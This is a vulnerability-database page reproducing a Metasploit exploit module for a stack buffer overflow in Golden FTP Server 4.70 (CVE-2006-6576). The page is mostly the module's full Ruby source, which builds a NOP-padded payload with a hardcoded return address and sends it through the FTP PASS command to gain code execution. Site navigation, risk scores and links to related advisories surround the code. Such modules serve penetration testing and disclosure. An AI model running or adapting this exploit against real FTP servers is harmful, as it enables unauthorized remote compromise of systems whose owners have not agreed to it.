Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormBanneditPACKETSTORM:101952
HistoryJun 03, 2011 - 12:00 a.m.

GoldenFTP PASS Stack Buffer Overflow

2011-06-0300:00:00
bannedit
packetstormsecurity.com
27

0.577 Medium

EPSS

Percentile

97.4%

JSON
`#  
# $Id: goldenftp_pass_bof.rb 12816 2011-06-02 12:24:25Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = AverageRanking  
  
include Msf::Exploit::Remote::Ftp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'GoldenFTP PASS Stack Buffer Overflow',  
'Description' => %q{  
This module exploits a vulnerability in the Golden  
FTP service. This module uses the PASS command to trigger the overflow.  
},  
'Author' => [ 'bannedit' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 12816 $',  
'References' =>  
[  
[ 'CVE', '2006-6576'],  
[ 'OSVDB', '35951'],  
[ 'BID', '45957 '],  
[ 'URL', 'http://www.exploit-db.com/exploits/16036/'],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'seh',  
},  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 350,  
'BadChars' => "\x00\x0a\x0d",  
},  
'Platform' => ['win'],  
'Targets' =>  
[  
[  
'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011  
{  
'Platform' => 'win',  
'Ret' => 0x00a93ca6,  
},  
]  
  
],  
'DisclosureDate' => 'Jan 23 2011'))  
end  
  
def check  
connect  
disconnect  
print_status("FTP Banner: #{banner}".strip)  
if banner =~ /Golden FTP Server ready v(4\.\d{2})/ and $1 == "4.70"  
return Exploit::CheckCode::Appears  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
def exploit  
if datastore['RHOST'].length < 15  
pad = make_nops(1) * (15 - datastore['RHOST'].length)  
end  
  
sploit = make_nops(4) * 38  
sploit << payload.encoded  
sploit << pad  
sploit << make_nops(1) * (528 - sploit.length)  
sploit << [target.ret].pack('V')  
  
print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")  
begin  
connect  
send_user("anonymous")  
send_cmd(['PASS', sploit], false)  
handler  
rescue EOFError  
end  
end  
end  
`

Related

zdt 1
openvas 2
checkpoint_advisories 1
packetstorm 1
cve 1
wallarmlab 1
zdt
zdt
Golden FTP Server 4.70 - (PASS) Buffer Overflow Exploit(2)
2021-03-09 00:00:00
openvas
openvas
Golden FTP PASS Command Buffer Overflow Vulnerability
2011-06-13 00:00:00
Golden FTP Server Malformed Message Denial Of Service Vulnerability
2011-01-20 00:00:00
checkpoint_advisories
checkpoint_advisories
Golden FTP PASS Buffer Overflow (CVE-2006-6576)
2014-11-27 00:00:00
packetstorm
packetstorm
Golden FTP Server 4.70 Buffer Overflow
2021-03-09 00:00:00
cve
cve
CVE-2006-6576
2006-12-15 19:28:00
wallarmlab
wallarmlab
Web vulnerabilities exploit weekly digest #1. March 8-15th 2021. VMware vCenter and Apache OFBiz RCE.
2021-03-16 18:22:00

0.577 Medium

EPSS

Percentile

97.4%

JSON
Related for PACKETSTORM:101952
zdt1openvas2checkpoint_advisories1packetstorm1cve1wallarmlab1